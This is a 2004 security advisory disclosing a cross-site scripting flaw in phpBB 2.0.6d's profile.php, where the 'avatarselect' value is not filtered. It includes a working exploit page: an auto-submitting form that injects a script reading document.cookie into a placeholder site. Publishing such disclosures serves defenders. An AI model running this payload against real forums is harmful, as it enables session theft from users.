#####################################################################

 Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
  Release Date : Mar 21,2004 
   Application : phpBB
       Version : phpBB 2.0.6d or others?
      Platform : PHP
    Vendor URL : http://www.phpbb.com/
        Author : Cheng Peng Su(apple_soup_at_msn.com)
     
#####################################################################

 Proof of Conecpt:
  
     This vuln is in profile.php,when you click [Show Gallery],phpBB 
  will show you Avatar gallery,asking you to choose one for yourself.
  The hole is in the form,after submitting phpBB will use the value of 
  "avatarselect" as the path of the gallery directly,without filtering
  any illegal characters.
   
 Exploit:
  
  -------------exploit.htm--------------
  <form name='f' action="http://site/profile.php?mode=editprofile" method="post">
  <input name="avatarselect" value='" >&lt;script&gt;alert(document.cookie)&lt;/script&gt;'>
  <input type="submit" name="submitavatar" value="Select avatar">
  </form>
  &lt;script&gt;
  window.onload=function()
   {
    document.all.submitavatar.click();
   }
  &lt;/script&gt;
  ---------------end-------------------
  
 Contact:
 
  Cheng Peng Su
  Class 1,Senior 2,High school attached to Wuhan University
  Wuhan,Hubei,China(430072)
  apple_soup_at_msn.com